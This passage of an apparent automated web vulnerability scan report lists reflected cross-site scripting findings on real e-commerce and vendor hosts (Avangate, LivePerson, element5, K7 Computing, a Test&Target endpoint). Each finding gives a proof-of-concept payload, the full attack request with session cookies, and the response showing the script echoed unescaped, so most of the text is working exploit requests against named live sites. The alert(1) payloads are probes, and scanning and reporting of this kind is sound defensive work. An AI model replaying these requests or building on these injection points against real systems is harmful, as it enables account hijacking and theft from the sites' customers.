1.7. http://pctools.tt.omtrdc.net/m2/pctools/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pctools.tt.omtrdc.net
Path:   /m2/pctools/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload b5388<script>alert(1)</script>ca1f38033ea was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/pctools/mbox/standard?mboxHost=www.pctools.com&mboxSession=1319387183177-475539&mboxPage=1319387183177-475539&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=default_lpb5388<script>alert(1)</script>ca1f38033ea&mboxId=0&mboxTime=1319369183623&mboxURL=http%3A%2F%2Fwww.pctools.com%2F&mboxReferrer=http%3A%2F%2Fwww.av-comparatives.org%2F&mboxVersion=40 HTTP/1.1
Host: pctools.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.pctools.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1319387183177-475539.19; Domain=pctools.tt.omtrdc.net; Expires=Sun, 06-Nov-2011 16:27:25 GMT; Path=/m2/pctools
Content-Type: text/javascript
Content-Length: 206
Date: Sun, 23 Oct 2011 16:27:25 GMT
Server: Test & Target

mboxFactories.get('default').get('default_lpb5388<script>alert(1)</script>ca1f38033ea',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1319387183177-475539.19");

1.8. http://sales.liveperson.net/hc/2735064/ [msessionkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload e2225<img%20src%3da%20onerror%3dalert(1)>fd97a2d10a7 was submitted in the msessionkey parameter. This input was echoed as e2225<img src=a onerror=alert(1)>fd97a2d10a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/2735064/?&visitor=5110247826455&msessionkey=8946513708771516066e2225<img%20src%3da%20onerror%3dalert(1)>fd97a2d10a7&siteContainer=STANDALONE&site=2735064&cmd=mTagKnockPage&lpCallId=138424393255-566736930282&protV=20&lpjson=1&id=6886589522&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/productDetails/slotNo/-1/productSkuCode/21184748/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8946513708771516066; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1319310919316

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:35:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8946513708771516066e2225<img src=a onerror=alert(1)>fd97a2d10a7; path=/hc/2735064
Set-Cookie: HumanClickKEY=8946513708771516066e2225<img src=a onerror=alert(1)>fd97a2d10a7; path=/hc/2735064
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 23 Oct 2011 16:35:41 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 36825

lpConnLib.Process({"ResultSet": {"lpCallId":"138424393255-566736930282","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
,{"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='2735064-VID'; lpMTagConfig.FPC_VID='5110247826455'; lpMTagConfig.FPC_SKEY_NAME='2735064-SKEY'; lpMTagConfig.FPC_SKEY='8946513708771516066e2225<img src=a onerror=alert(1)>fd97a2d10a7';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_2735064'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport(
...[SNIP]...

1.9. https://secure.avangate.com/order/cart.php [CART_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce942"><script>alert(1)</script>221f4b7027a924945 was submitted in the CART_ID parameter. This input was echoed as ce942\"><script>alert(1)</script>221f4b7027a924945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=6666fe17f2bc324cd19f55da68f5a44bce942"><script>alert(1)</script>221f4b7027a924945&qty0=1&prod0=4020750&submit_type=cross_selling&coupon=&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.avangate.com/order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eq6ds2k5q5c1ls2c0kr4fbb3k8g7kgn4; GKD=%95%DB%AC%E2%A0%BC%90%BA%92%A9%B3%DA%BD%C2%A0%9A%90%AE%99%B9%95%CE%BD%D5%A0%CF%8D%A9%92%96%9A%CA%B0%9D%9C%98%90%BB%9E%AB%97%B5%C6%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:35:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=6666fe17f2bc324cd19f55da68f5a44bce942\"><script>alert(1)</script>221f4b7027a924945" target="_blank">
...[SNIP]...

1.10. https://secure.avangate.com/order/cart.php [SHOPURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The value of the SHOPURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 27a2c'><script>alert(1)</script>61b00100668 was submitted in the SHOPURL parameter. This input was echoed as 27a2c\'><script>alert(1)</script>61b00100668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD27a2c'><script>alert(1)</script>61b00100668 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.escanav.com/english/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:29:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 41945


<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
<![endif]-->
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
   <meta http-equiv=
...[SNIP]...
<a class="order__link order__homepage__link" href='http://www.escanav.com/mwscnew/index.asp?cu=USD27a2c\'><script>alert(1)</script>61b00100668'>
...[SNIP]...

1.11. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 964cf'><script>alert(1)</script>bddb008a6fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 964cf\'><script>alert(1)</script>bddb008a6fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu/964cf'><script>alert(1)</script>bddb008a6fb=USD HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.escanav.com/english/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:29:45 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 41946


<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
<![endif]-->
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
   <meta http-equiv=
...[SNIP]...
<a class="order__link order__homepage__link" href='http://www.escanav.com/mwscnew/index.asp?cu/964cf\'><script>alert(1)</script>bddb008a6fb=USD'>
...[SNIP]...

1.12. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ceb"><script>alert(1)</script>4d8bccc25b0455427 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ceb\"><script>alert(1)</script>4d8bccc25b0455427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=6666fe17f2bc324cd19f55da68f/89ceb"><script>alert(1)</script>4d8bccc25b04554275a44b&qty0=1&prod0=4020750&submit_type=cross_selling&coupon=&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.avangate.com/order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eq6ds2k5q5c1ls2c0kr4fbb3k8g7kgn4; GKD=%95%DB%AC%E2%A0%BC%90%BA%92%A9%B3%DA%BD%C2%A0%9A%90%AE%99%B9%95%CE%BD%D5%A0%CF%8D%A9%92%96%9A%CA%B0%9D%9C%98%90%BB%9E%AB%97%B5%C6%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:35:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=6666fe17f2bc324cd19f55da68f/89ceb\"><script>alert(1)</script>4d8bccc25b04554275a44b" target="_blank">
...[SNIP]...

1.13. https://secure.avangate.com/order/checkout.php [CART_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d878"><script>alert(1)</script>27b37f62572 was submitted in the CART_ID parameter. This input was echoed as 5d878\"><script>alert(1)</script>27b37f62572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=6666fe17f2bc324cd19f55da68f5a44b5d878"><script>alert(1)</script>27b37f62572 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.avangate.com/order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eq6ds2k5q5c1ls2c0kr4fbb3k8g7kgn4; GKD=%95%DB%AC%E2%A0%BC%90%BA%92%A9%B3%DA%BD%C2%A0%9A%90%AE%99%B9%95%CE%BD%D5%A0%CF%8D%A9%92%96%9A%CA%B0%9D%9C%98%90%BB%9E%AB%97%B5%C6%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:33:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=6666fe17f2bc324cd19f55da68f5a44b5d878\"><script>alert(1)</script>27b37f62572" target="_blank">
...[SNIP]...

1.14. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe14"><script>alert(1)</script>67ad459a50d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as abe14\"><script>alert(1)</script>67ad459a50d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=6666fe17f2bc324cd19f55da68f5/abe14"><script>alert(1)</script>67ad459a50da44b HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.avangate.com/order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eq6ds2k5q5c1ls2c0kr4fbb3k8g7kgn4; GKD=%95%DB%AC%E2%A0%BC%90%BA%92%A9%B3%DA%BD%C2%A0%9A%90%AE%99%B9%95%CE%BD%D5%A0%CF%8D%A9%92%96%9A%CA%B0%9D%9C%98%90%BB%9E%AB%97%B5%C6%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:33:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=6666fe17f2bc324cd19f55da68f5/abe14\"><script>alert(1)</script>67ad459a50da44b" target="_blank">
...[SNIP]...

1.15. https://secure.element5.com/esales/checkout.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.element5.com
Path:   /esales/checkout.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3998b"style%3d"x%3aexpression(alert(1))"cc6aa44df2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3998b"style="x:expression(alert(1))"cc6aa44df2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /esales/checkout.html?sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&productid=300417896&quickbuy=1&3998b"style%3d"x%3aexpression(alert(1))"cc6aa44df2c=1 HTTP/1.1
Host: secure.element5.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://esd.element5.com/product.html?productid=300417896&backlink=http%3A%2F%2Fwww.trustport.com%2Fen&cookies=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessioncookie=2028757849%3Add1d7f168ffac04c5e1f4c172f9fd933

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:53:05 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 77098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>TrustPort, a.s. - eStore</title>
<style type="text/css">

...[SNIP]...
<form action="/esales/checkout.html?quickbuy=1&3998b"style="x:expression(alert(1))"cc6aa44df2c=1&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933" method="post">
...[SNIP]...

1.16. https://secure.element5.com/esales/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.element5.com
Path:   /esales/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fcd"style%3d"x%3aexpression(alert(1))"84730791e81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98fcd"style="x:expression(alert(1))"84730791e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /esales/product.html?productid=300417896&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&98fcd"style%3d"x%3aexpression(alert(1))"84730791e81=1 HTTP/1.1
Host: secure.element5.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.element5.com/esales/checkout.html?sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&productid=300417896&quickbuy=1&js=-1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessioncookie=2028757849%3Add1d7f168ffac04c5e1f4c172f9fd933

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:50:36 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 28580

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>TrustPort, a.s. - eStore</title>
<style type="text/css">

...[SNIP]...
<form action="/esales/product.html?productid=300417896&98fcd"style="x:expression(alert(1))"84730791e81=1&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933&sessionid=2028757849&random=dd1d7f168ffac04c5e1f4c172f9fd933" method="post">
...[SNIP]...

1.17. https://secure.k7computing.com/esales/checkout.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.k7computing.com
Path:   /esales/checkout.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d45"style%3d"x%3aexpression(alert(1))"64c433f0ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0d45"style="x:expression(alert(1))"64c433f0ffb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /esales/checkout.html?PRODUCT[300456844]=1&js=-1&a0d45"style%3d"x%3aexpression(alert(1))"64c433f0ffb=1 HTTP/1.1
Host: secure.k7computing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.k7computing.com/en/Online-Store/Buy-Antivirus-Software-from-K7-Computing.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=230062854.39582605.1319387171.1319387171.1319387171.1; __utmb=230062854.2.10.1319387171; __utmc=230062854; __utmz=230062854.1319387171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:30:53 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 150805

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>K7 Product Store - K7 Antivirus and Internet Security - K7 Computing</title>
<style type="text/css">
<!--
/*Hauptel
...[SNIP]...
<form action="/esales/checkout.html?js=-1&a0d45"style="x:expression(alert(1))"64c433f0ffb=1&sessionid=2028752510&random=76838fa6a12ef8c7a83b81052767d7f8&sessionid=2028752510&random=76838fa6a12ef8c7a83b81052767d7f8" method="post">
...[SNIP]...

1.18. https://secure.k7computing.com/esales/faxorder.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.k7computing.com
Path:   /esales/faxorder.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c58b9"style%3d"x%3aexpression(alert(1))"b2652687fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c58b9"style="x:expression(alert(1))"b2652687fe1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /esales/faxorder.html?sessionid=2028751322&random=3e8d2fae8b0c88f58ce09fac2795cb78&c58b9"style%3d"x%3aexpression(alert(1))"b2652687fe1=1 HTTP/1.1
Host: secure.k7computing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.k7computing.com/esales/checkout.html?PRODUCT[300456844]=1&js=-1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=230062854.39582605.1319387171.1319387171.1319387171.1; __utmb=230062854.2.10.1319387171; __utmc=230062854; __utmz=230062854.1319387171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerp-dc5-e5-moonlight-sol-01=1124205834.20480.0000

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:33:46 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55158

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>K7 Product Store - K7 Antivirus and Internet Security - K7 Computing</title>
<style type="text/css">
<!--
/*Hauptel
...[SNIP]...
<form action="/esales/faxorder.html?c58b9"style="x:expression(alert(1))"b2652687fe1=1&sessionid=2028751322&random=3e8d2fae8b0c88f58ce09fac2795cb78&sessionid=2028751322&random=3e8d2fae8b0c88f58ce09fac2795cb78" method="post">
...[SNIP]...

